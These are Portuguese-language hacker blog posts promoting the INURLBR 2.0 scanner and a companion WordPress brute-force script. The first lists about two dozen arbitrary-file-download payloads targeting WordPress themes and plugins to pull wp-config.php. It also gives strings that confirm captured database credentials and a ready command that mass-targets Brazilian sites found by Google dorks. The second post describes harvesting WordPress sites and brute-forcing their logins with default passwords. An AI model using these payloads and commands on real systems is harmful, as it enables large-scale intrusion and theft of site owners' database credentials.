Nova versão do Scanner INURLBR!

 

 

 

Salve! salve! depois de anos dei um tapa no code do scanner INURLBR. E galera uma nova persona vai tocar o projeto, um tal de MrCl0wn Security Lab.

Para quem acompanha o projeto INURLBR que foi criado em meados de 2014 em sua versão public, mas o code priv8 é datado de 2011..2012, sabe que a INURL BRASIL tinha como ideia principal fomentar a cena coder(tool) nas terras tupiniquim. 

Afinal, o que mudou no script?

Inicialmente foi migrado o repo de https://github.com/googleinurl/SCANNER-INURLBR/ para meu novo perfil https://github.com/MrCl0wnLab/SCANNER-INURLBR onde tentarei dar uma melhor organizada no projeto.

Para mais detalhes:

• https://blog.mrcl0wn.com/hacking/nova-versao-do-scanner-inurlbr.html

CONCEITO DE SUB_PROCESS / SCANNER INURLBR 2.0

 SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido.

============================================================

[!] LISTA DE STRING'S QUE SERÁ EXECUTADA(concatenada) PRA CADA ALVO ENCONTRADO.

1. ['LIST_XPL_NAME']: = listxpl_wordpress_afd.txt

Conteúdo arquivo - URL XPL Wordpress Vulnerability Arbitrary File Download:

• /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
• /wp-content/force-download.php?file=../wp-config.php
• /wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
• /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
• /wp-content/themes/markant/download.php?file=../../wp-config.php
• /wp-content/themes/yakimabait/download.php?file=./wp-config.php
• /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
• /wp-content/themes/felis/download.php?file=../wp-config.php
• /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
• /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
• /wp-content/themes/epic/includes/download.php?file=wp-config.php
• /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
• /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
• /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
• /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
• /wp-content/themes/lote27/download.php?download=../../../wp-config.php
• /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
• /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
• /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
• /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
• /wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
• /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
• /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php

--------------------------------------------------------------------------------------

[!] CMS WORDPRESS VALIDATION / INURLBR 2.0
 Já possui tal validação por padrão padrão interno.

• ['CMS-WORDPRESS-01'] = "define('DB_NAME'";
• ['CMS-WORDPRESS-02'] = "define('DB_USER'";
• ['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
• ['CMS-WORDPRESS-04'] = "define('DB_HOST'";

--------------------------------------------------------------------------------------

 [!] Running subprocesses:
 
 --sub-file  Subprocess performs an injection 
     strings in URLs found by the engine, via GET or POST.
     Example: --sub-file {youfile}
     Usage:   --sub-file exploits_get.txt
         
 --sub-get defines whether the strings coming from 
     --sub-file will be injected via GET.
     Usage:   --sub-get
         
 --sub-post defines whether the strings coming from 
     --sub-file will be injected via POST.
     Usage:   --sub-get

[!] Descrição de comando usado:

1. DEFINIR DORK:                       --dork 'DORK'
2. DEFINIR ARQUIVO FONTE:  -s 'output.txt'
3. DEFINIR DORK:                       --sub-file 'file_subprocess.txt'
4. FLAG TIPO REQUEST:            --sub-get / FLAG
5. FLAG FILTRO HOST:              --unique  / HOST ÚNICOS EM SEU RESULTADO

[!] COMMAND EXEC:
GO! GO! ~
php inurlbr.php --dork 'site:br "Index of /wp-content/plugins/revslider"' -s teste.txt --sub-file 'listxpl_wordpress_afd.txt' --sub-get --unique

--------------------------------------------------------------------------------------

CADA BARRINHA  QUE É DEMONSTRADA, É UM PROCESSO DE VALIDAÇÃO..
Dá mesma forma que usei uns (strings/urls)xpls Wordpress, pode ser usado de outros CMS's...
ou URL's padrões para tentar gerar erros SQLI no server, Ataques LFI dá mesma forma..

[!] VÍDEO DEMONSTRATIVO:

Baixar scanner INURLBR 2.0: 
https://github.com/googleinurl/SCANNER-INURLBR

• [+] AUTOR:       googleINURL
• [+] Blog:              http://blog.inurl.com.br
• [+] Twitter:          https://twitter.com/googleinurl
• [+] Fanpage:        https://fb.com/InurlBrasil
• [+] Pastebin         http://pastebin.com/u/Googleinurl
• [+] GIT:               https://github.com/googleinurl
• [+] PSS:               http://packetstormsecurity.com/user/googleinurl
• [+] YOUTUBE:   http://youtube.com/c/INURLBrasil
• [+] PLUS:            http://google.com/+INURLBrasil

[ Neither war between hackers, nor peace for the system. ]

Inurlbr dorking + Wordpress brute forcing

[ Inurlbr dorking + Wordpress brute forcing ]

    Eae galera, esses dias eu estava pesquisando algumas falhas em wordpress, então tive uma ideia de montar um script que realiza-se um bruteforce em wordpress's, Só que antes ele cata-se os sites com cms (Wordpress) e salva-se em um .txt.

    Pensei em fazer essa etapa de dorking na mão, mas pra quer ter esse trabalho todo quando se pode se utilizar o nosso scaner Inurlbr <3 com as dorks já definidas. Depois de catar as url na etapa de dorking com Inurlbr, Montei o script que verifica se aquela url trabalha ou não com Wordpress, caso não trabalhar ele te print na tela "Not is wordpress" caso contrario ele realizará o bruteforce com senhas padrões contidas dentro do código. No script tem poucas senhas mas você pode incrementar mas senhas ou se você tiver um pequeno conhecimento em python você pode colocar o script para carregar um wordlist.txt.

   A etapa de dorking você pode escolher em fazer manualmente ou deixar o script fazer por você, na execução ele ira te perguntar; Dorking use to find sites using the inurlbr? [Y][N].

[ COMMAND SCANNER INURLBR ]

• ./inurlbr.php -q 1,6 --dork "[DORK]inurl:wp-content site:.com.br[DORK]inurl:wp-content/plugins/ site:.com.br" -s list.txt --comand-all "echo _TARGET_ >> list.txt"
• Você pode adicionar mas dorks no comando do scanner, seperando elas com "[DORK]"

[ TOOLS ]

• wpbf.py: https://github.com/jh00nbr/Python/blob/master/wpbf.py
• Inurlbr.php:  https://github.com/googleinurl/SCANNER-INURLBR/blob/master/inurlbr.php

  [DEMO]